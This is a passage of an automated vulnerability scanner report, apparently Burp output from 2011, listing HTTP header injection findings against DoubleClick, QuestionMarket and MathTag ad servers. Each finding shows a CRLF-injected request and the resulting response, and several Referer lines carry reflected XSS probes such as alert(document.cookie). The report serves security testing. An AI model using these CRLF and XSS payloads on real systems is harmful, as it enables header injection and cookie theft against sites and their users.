GET /79d28%0d%0ae5080b05c95/huffpost.politics/news/curtain;featured-posts=1;politics=1;;entry_id=859012;2012-election=1;@mostpopular=1;rick-santorum=1;elections-2012=1;rick-santorum-for-president=1;santorum-for-president=1;rick-santorum-2012=1;rick-santorum-south-carolina-straw-poll=1;santorum-2012=1;south-carolina-primary-election=1;south-carolina-straw-poll=1;south-carolina-straw-poll-2011=1;south-carolina-straw-poll-results=1;global=1;cap_12=n;qcs=D;qcs=T;qcs=2689;qcs=2687;qcs=2685;qcs=1908;qcs=1905;qcs=1592;qcs=683;qcs=680;qcs=679;qcs=678;qcs=666;qcs=665;qcs=657;;plat=win;br=ch;bv=11;subbv=0;load_mode=inline;page_type=bpage;pos=curtain;dcopt=ist;u=938x200%7Cbpage%7Ccurtain%7C2012-election,@mostpopular,rick-santorum,elections-2012,rick-santorum-for-president,santorum-for-president,rick-santorum-2012,rick-santorum-south-carolina-straw-poll,santorum-2012,south-carolina-primary-election,south-carolina-straw-poll,south-carolina-straw-poll-2011,south-carolina-straw-poll-results%7C%7C%7CD,T,2689,2687,2685,1908,1905,1592,683,680,679,678,666,665,657%7C859012%7C%7C%7C;sz=938x200;tile=2;ord=72222061? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/05/07/rick-santorum-south-carolina-straw-poll_n_859012.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/79d28
e5080b05c95
/huffpost.politics/news/curtain;featured-posts=1;politics=1;;entry_id=859012;2012-election=1;@mostpopular=1;rick-santorum=1;elections-2012=1;rick-santorum-for-president=1;santorum-for-president=1;rick-santorum-2012=1;rick-santorum-south-carolina-straw-poll=1;santorum-2012=1;south-:
Date: Tue, 10 May 2011 13:20:24 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.23. http://ad.doubleclick.net/adj/ns.androidcentral/general/archive [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/ns.androidcentral/general/archive

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 61eab%0d%0a1560136f95c was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /61eab%0d%0a1560136f95c/ns.androidcentral/general/archive;net=ns;u=,ns-13398115_1305033285,11f8f328940989e,itbusmb,dx.16-dx.23-dx.17-mm.ag1-mm.ak1-mm.am1-mm.aq1;;ppos=btf;kw=;tile=2;cmw=owl;sz=300x250,336x280;net=ns;ord1=505344;contx=itbusmb;dc=w;btg=dx.16;btg=dx.23;btg=dx.17;btg=mm.ag1;btg=mm.ak1;btg=mm.am1;btg=mm.aq1;ord=2250960881356150? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.androidcentral.com/android-central-google-io-2011
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/61eab
1560136f95c
/ns.androidcentral/general/archive;net=ns;u=,ns-13398115_1305033285,11f8f328940989e,itbusmb,dx.16-dx.23-dx.17-mm.ag1-mm.ak1-mm.am1-mm.aq1;;ppos=btf;kw=;tile=2;cmw=owl;sz=300x250,336x280;net=ns;ord1=505344;contx=itbusmb;dc=w;btg=dx.16;btg=dx.23;btg=dx.17;btg=mm.ag1;btg=mm.ak1;btg=m:
Date: Tue, 10 May 2011 13:40:01 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.24. http://ad.doubleclick.net/adj/ph.admin/adsense [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/ph.admin/adsense

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 4b413%0d%0acbd46c173ef was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /4b413%0d%0acbd46c173ef/ph.admin/adsense;!category=register;type=admin;dcopt=ist;pos=google;tile=11;sz=728x90;ord=1305037222218? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.philly.com/s?action=reg&requested=y&rurl=http%3A%2F%2Fwww.philly.com%2Fphilly%2Fnews%2Fnation_world%2F121548659.html%3Fef135%27%3Balert%28document.cookie%29%2F%2F4b169261d24%3D1
Cookie: id=c60bd0733000097||t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/4b413
cbd46c173ef
/ph.admin/adsense;!category=register;type=admin;dcopt=ist;pos=google;tile=11;sz=728x90;ord=1305037222218:
Date: Tue, 10 May 2011 14:26:41 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.25. http://ad.doubleclick.net/adj/ph.admin/register [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/ph.admin/register

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 9ddc8%0d%0ab62af171f16 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /9ddc8%0d%0ab62af171f16/ph.admin/register;!category=register;type=admin;dcopt=ist;pos=leader;tile=1;sz=728x90;ord=1305037222218? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.philly.com/s?action=reg&requested=y&rurl=http%3A%2F%2Fwww.philly.com%2Fphilly%2Fnews%2Fnation_world%2F121548659.html%3Fef135%27%3Balert%28document.cookie%29%2F%2F4b169261d24%3D1
Cookie: id=c60bd0733000097||t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/9ddc8
b62af171f16
/ph.admin/register;!category=register;type=admin;dcopt=ist;pos=leader;tile=1;sz=728x90;ord=1305037222218:
Date: Tue, 10 May 2011 14:24:45 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.26. http://ad.doubleclick.net/adj/ph.mobile/adsense [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/ph.mobile/adsense

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 88b02%0d%0a89b56735fc8 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /88b02%0d%0a89b56735fc8/ph.mobile/adsense;!category=mobile;type=primary;dcopt=ist;pos=google;tile=12;sz=728x90;ord=1305037226014? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.philly.com/philly/mobile/
Cookie: id=c60bd0733000097||t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/88b02
89b56735fc8
/ph.mobile/adsense;!category=mobile;type=primary;dcopt=ist;pos=google;tile=12;sz=728x90;ord=1305037226014:
Date: Tue, 10 May 2011 14:25:43 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.27. http://ad.doubleclick.net/adj/ph.news/adsense [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/ph.news/adsense

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 382f5%0d%0a8a070142022 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /382f5%0d%0a8a070142022/ph.news/adsense;!category=nation_world;art=inq;type=article;dcopt=ist;pos=google;tile=1;sz=300x250;ord=1305037179578? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.philly.com/philly/news/nation_world/121548659.html?ef135%27%3balert(document.cookie)//4b169261d24=1
Cookie: id=c60bd0733000097||t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/382f5
8a070142022
/ph.news/adsense;!category=nation_world;art=inq;type=article;dcopt=ist;pos=google;tile=1;sz=300x250;ord=1305037179578:
Date: Tue, 10 May 2011 14:21:45 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.28. http://ad.doubleclick.net/adj/ph.news/nation_world [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/ph.news/nation_world

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 200d0%0d%0aa3dc10f3324 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /200d0%0d%0aa3dc10f3324/ph.news/nation_world;!category=nation_world;art=inq;type=article;dcopt=ist;pos=leader;tile=1;sz=728x90;ord=1305037179578? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.philly.com/philly/news/nation_world/121548659.html?ef135%27%3balert(document.cookie)//4b169261d24=1
Cookie: id=c60bd0733000097||t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/200d0
a3dc10f3324
/ph.news/nation_world;!category=nation_world;art=inq;type=article;dcopt=ist;pos=leader;tile=1;sz=728x90;ord=1305037179578:
Date: Tue, 10 May 2011 14:21:36 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.29. http://ad.doubleclick.net/adj/q1.philly/news [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/q1.philly/news

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 78e48%0d%0af7cf34ba712 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /78e48%0d%0af7cf34ba712/q1.philly/news;net=q1;u=,q1-53142949_1305033112,11f8f328940989e,polit,q1.polit_h-q1.none_h-q1.ent_h-q1.food_h-q1.sports_h-dx.16-dx.23-dx.17-mm.ag1-mm.ak1-mm.am1-mm.aq1-cm.ent_h-cm.music_h-cm.weath_h-cm.sports_h;;sz=300x600;net=q1;ord1=158490;contx=polit;dc=w;btg=q1.polit_h;btg=q1.none_h;btg=q1.ent_h;btg=q1.food_h;btg=q1.sports_h;btg=dx.16;btg=dx.23;btg=dx.17;btg=mm.ag1;btg=mm.ak1;btg=mm.am1;btg=mm.aq1;btg=cm.ent_h;btg=cm.music_h;btg=cm.weath_h;btg=cm.sports_h;ord=[timestamp]? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.philly.com/philly/news/nation_world/121548659.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/78e48
f7cf34ba712
/q1.philly/news;net=q1;u=,q1-53142949_1305033112,11f8f328940989e,polit,q1.polit_h-q1.none_h-q1.ent_h-q1.food_h-q1.sports_h-dx.16-dx.23-dx.17-mm.ag1-mm.ak1-mm.am1-mm.aq1-cm.ent_h-cm.music_h-cm.weath_h-cm.sports_h;;sz=300x600;net=q1;ord1=158490;contx=polit;dc=w;btg=q1.polit_h;btg=q1:
Date: Tue, 10 May 2011 13:14:50 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.30. http://ad.doubleclick.net/adj/zdgeek.dart/geek-cetera [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/zdgeek.dart/geek-cetera

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 9dcfe%0d%0aba92f5cd663 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /9dcfe%0d%0aba92f5cd663/zdgeek.dart/geek-cetera;pos=top;dcopt=ist;!category=geek-cetera;sz=160x600;tile=1;ord=6872733993620893? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.geek.com/articles/geek-pick/63398--%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3E7861d958a55/
Cookie: id=c60bd0733000097||t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/9dcfe
ba92f5cd663
/zdgeek.dart/geek-cetera;pos=top;dcopt=ist;!category=geek-cetera;sz=160x600;tile=1;ord=6872733993620893:
Date: Tue, 10 May 2011 14:17:07 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.31. http://ad.doubleclick.net/pfadx/philly_cim/ [dcove parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /pfadx/philly_cim/

Issue detail

The value of the dcove request parameter is copied into the DCLK_imp response header. The payload 934c2%0d%0a447bd9706e7 was submitted in the dcove parameter. This caused a response containing an injected HTTP header.

Request

GET /pfadx/philly_cim/;dcove=934c2%0d%0a447bd9706e7 HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.meebo.com/cim/sandbox.php?lang=en&version=v92_cim_11_8_0&protocol=http%3A&network=philly
Cookie: id=c60bd0733000097||t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: video/x-ms-asf
Content-Length: 237
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 10 May 2011 14:21:11 GMT
Expires: Tue, 10 May 2011 14:21:11 GMT
DCLK_imp: v7;x;44306;0-0;0;55848032;0/0;0/0/0;;~aopt=2/1/22/0;~okv=;dcove=934c2
447bd9706e7
;~cs=s:

<a target="_top" href="http://ad.doubleclick.net/click;h=v8/3b03/0/0/%2a/r;44306;0-0;0;55848032;783-50/50;0/0/0;;~aopt=2/1/22/0;~sscs=%3f"><img src="http://s0.2mdn.net/viewad/817-grey.gif" border=1 al
...[SNIP]...

3.32. http://ad.doubleclick.net/pfadx/philly_cim/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /pfadx/philly_cim/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the DCLK_imp response header. The payload 6e37b%0d%0afb30a1b7521 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /pfadx/philly_cim/;secure=false;position=1;ic22=1;ic19=1;ic17=1;ic16=1;ic12=1;ac17=1;ac16=1;ac14=1;ac12=1;ac10=1;pc1=1;pc4=1;ic9=1;ac5=1;ic3=1;ic1=1;ac8=1;ic5=1;AG=1;AK=1;AM=1;AQ=1;ac18=1;ac2=1;ic23=1;pc5=1;ic13=1;pc2=1;ic2=1;sz=24x24;dcmt=text/html;ord=1305033093514?&6e37b%0d%0afb30a1b7521=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.meebo.com/cim/sandbox.php?lang=en&version=v92_cim_11_8_0&protocol=http%3A&network=philly
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
DCLK_imp: v7;x;239897814;0-0;1;55848032;24/24;41985765/42003552/1;;~aopt=2/1/22/0;~okv=;secure=false;position=1;ic22=1;ic19=1;ic17=1;ic16=1;ic12=1;ac17=1;ac16=1;ac14=1;ac12=1;ac10=1;pc1=1;pc4=1;ic9=1;ac5=1;ic3=1;ic1=1;ac8=1;ic5=1;AG=1;AK=1;AM=1;AQ=1;ac18=1;ac2=1;ic23=1;pc5=1;ic13=1;pc2=1;ic2=1;sz=24x24;dcmt=text/html;;6e37b
fb30a1b7521
=1;~cs=v:
Date: Tue, 10 May 2011 13:13:07 GMT
Content-Length: 1225

DoubleClick.onAdLoaded('MediaAlert', {"impression": "http://ad.doubleclick.net/imp;v7;x;239897814;0-0;1;55848032;24/24;41985765/42003552/1;;~aopt=2/1/22/0;~okv=;secure=false;position=1;ic22=1;ic19=1;i
...[SNIP]...

3.33. http://ad.doubleclick.net/pfadx/philly_cim/ [secure parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /pfadx/philly_cim/

Issue detail

The value of the secure request parameter is copied into the DCLK_imp response header. The payload 2f8b8%0d%0a9f03c22d42c was submitted in the secure parameter. This caused a response containing an injected HTTP header.

Request

GET /pfadx/philly_cim/;secure=2f8b8%0d%0a9f03c22d42c HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.meebo.com/cim/sandbox.php?lang=en&version=v92_cim_11_8_0&protocol=http%3A&network=philly
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: video/x-ms-asf
Content-Length: 237
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 10 May 2011 13:12:01 GMT
Expires: Tue, 10 May 2011 13:12:01 GMT
DCLK_imp: v7;x;44306;0-0;0;55848032;0/0;0/0/0;;~aopt=2/1/22/0;~okv=;secure=2f8b8
9f03c22d42c
;~cs=s:

<a target="_top" href="http://ad.doubleclick.net/click;h=v8/3b03/0/0/%2a/r;44306;0-0;0;55848032;783-50/50;0/0/0;;~aopt=2/1/22/0;~sscs=%3f"><img src="http://s0.2mdn.net/viewad/817-grey.gif" border=0 al
...[SNIP]...

3.34. http://amch.questionmarket.com/adscgen/sta.php [code parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adscgen/sta.php

Issue detail

The value of the code request parameter is copied into the Location response header. The payload 50692%0d%0a9754cdb8dea was submitted in the code parameter. This caused a response containing an injected HTTP header.

Request

GET /adscgen/sta.php?survey_num=887938&site=2378235&code=487810250692%0d%0a9754cdb8dea&ut_sys=eb HTTP/1.1
Host: amch.questionmarket.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.philly.com/philly/news/nation_world/121548659.html?ef135%27%3balert(document.cookie)//4b169261d24=1

Response

HTTP/1.1 302 Found
Date: Tue, 10 May 2011 14:25:18 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
X-Powered-By: PHP/4.3.8
DL_S: a209.dl
Set-Cookie: CS1=887938-1-1; expires=Sat, 30-Jun-2012 06:25:18 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=887938-L$/(M-0; expires=Sat, 30-Jun-2012 06:25:18 GMT; path=/; domain=.questionmarket.com;
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Location: http://a.dlqm.net/adscgen/log_ut_err.php?adserver=eb&survey_num=887938&site=36-2378235-&code=487810250692
9754cdb8dea

Content-Length: 34
Content-Type: text/html

/* /adsc/d887938/36/-1/randm.js */

3.35. http://amch.questionmarket.com/adscgen/sta.php [site parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adscgen/sta.php

Issue detail

The value of the site request parameter is copied into the Location response header. The payload eb267%0d%0a23d381da87d was submitted in the site parameter. This caused a response containing an injected HTTP header.

Request

GET /adscgen/sta.php?survey_num=887938&site=eb267%0d%0a23d381da87d&code=4878102&ut_sys=eb HTTP/1.1
Host: amch.questionmarket.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.philly.com/philly/news/nation_world/121548659.html?ef135%27%3balert(document.cookie)//4b169261d24=1

Response

HTTP/1.1 302 Found
Date: Tue, 10 May 2011 14:24:29 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
X-Powered-By: PHP/4.3.8
DL_S: a231.dl
Set-Cookie: CS1=887938-1-1; expires=Sat, 30-Jun-2012 06:24:29 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=887938-x#/(M-0; expires=Sat, 30-Jun-2012 06:24:29 GMT; path=/; domain=.questionmarket.com;
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Location: http://a.dlqm.net/adscgen/log_ut_err.php?adserver=eb&survey_num=887938&site=-1-eb267
23d381da87d
-&code=4878102
Content-Length: 44
Content-Type: text/html

/* /adsc/d887938/-1/500004878102/randm.js */

3.36. http://bidder.mathtag.com/iframe/notify [exch parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bidder.mathtag.com
Path:   /iframe/notify

Issue detail

The value of the exch request parameter is copied into the x-mm-debug response header. The payload dc7ea%0d%0a298f1c0e803 was submitted in the exch parameter. This caused a response containing an injected HTTP header.

Request

GET /iframe/notify?exch=dc7ea%0d%0a298f1c0e803&id=5aW95q2jLzEvUTBGRlUwVkpOMEYwYjJoYVFVSXhkVlpSUjA5elRsaFZhMlJKL05HUmhZamRrTXpVdFlqRmtNaTA1TVRWaExXUXpZekF0T1dRMU4yWTVZelkyWWpBMy8yNjg3NDIzNDk3MDk2NDAzNjAvMTE1MDAzLzEwMDQ3MC80L1EzQW1fQ25wZlFVZ053MjlWUjRoVHV2N2NlUVNRWmNITnVfclJ1S0tBS28v/vEV5FyPu2ISYlluSJbgs6DJemzY&price=Tck9qAAIETkK7F2h1e88yFrVKAuunn27bfXY2A&dck=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBM6R_qD3JTbmiIKG7sQfI-byvDdzvj_EB5PW9vBH454OTEgAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi03NTg3MzE0MjU0MDkyMjQ4oAHg6pnsA7IBFnd3dy5rbm93eW91cm1vYmlsZS5jb226AQk3Mjh4OTBfYXPIAQnaAXNodHRwOi8vd3d3Lmtub3d5b3VybW9iaWxlLmNvbS9mZWF0dXJlc2ViMDFiJTIyLWFsZXJ0KCUyMlhTUyUyMiktJTIyYzFkM2E1OGY5OGEvODgxNzQwL2dvb2dsZV9pb193aGF0X3RvX2V4cGVjdC5odG1smALuCsACBMgC1sGMDqgDAegDrwjoA4YD6ANO6AOvAvUDBgAAxIAGqcqGqrbH1Jtb%26num%3D1%26sig%3DAGiWqtzW5hpUbFxB3gelMXQv-DmJv8ZmTA%26client%3Dca-pub-7587314254092248%26adurl%3D HTTP/1.1
Host: bidder.mathtag.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7587314254092248&output=html&h=90&slotname=9491098414&w=728&lmt=1305052151&flash=10.2.154&url=http%3A%2F%2Fwww.knowyourmobile.com%2Ffeatureseb01b%2522-alert(%2522XSS%2522)-%2522c1d3a58f98a%2F881740%2Fgoogle_io_what_to_expect.html&dt=1305034151054&bpp=3&shv=r20110427&jsv=r20110427&prev_slotnames=6665882529&correlator=1305034136711&frm=0&adk=3935617407&ga_vid=1292799472.1305033311&ga_sid=1305033311&ga_hid=1941275286&ga_fc=1&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1050&bih=951&ref=http%3A%2F%2Fburp%2Fshow%2F12&fu=0&ifi=2&dtd=56&xpc=mB7TCo5i79&p=http%3A//www.knowyourmobile.com
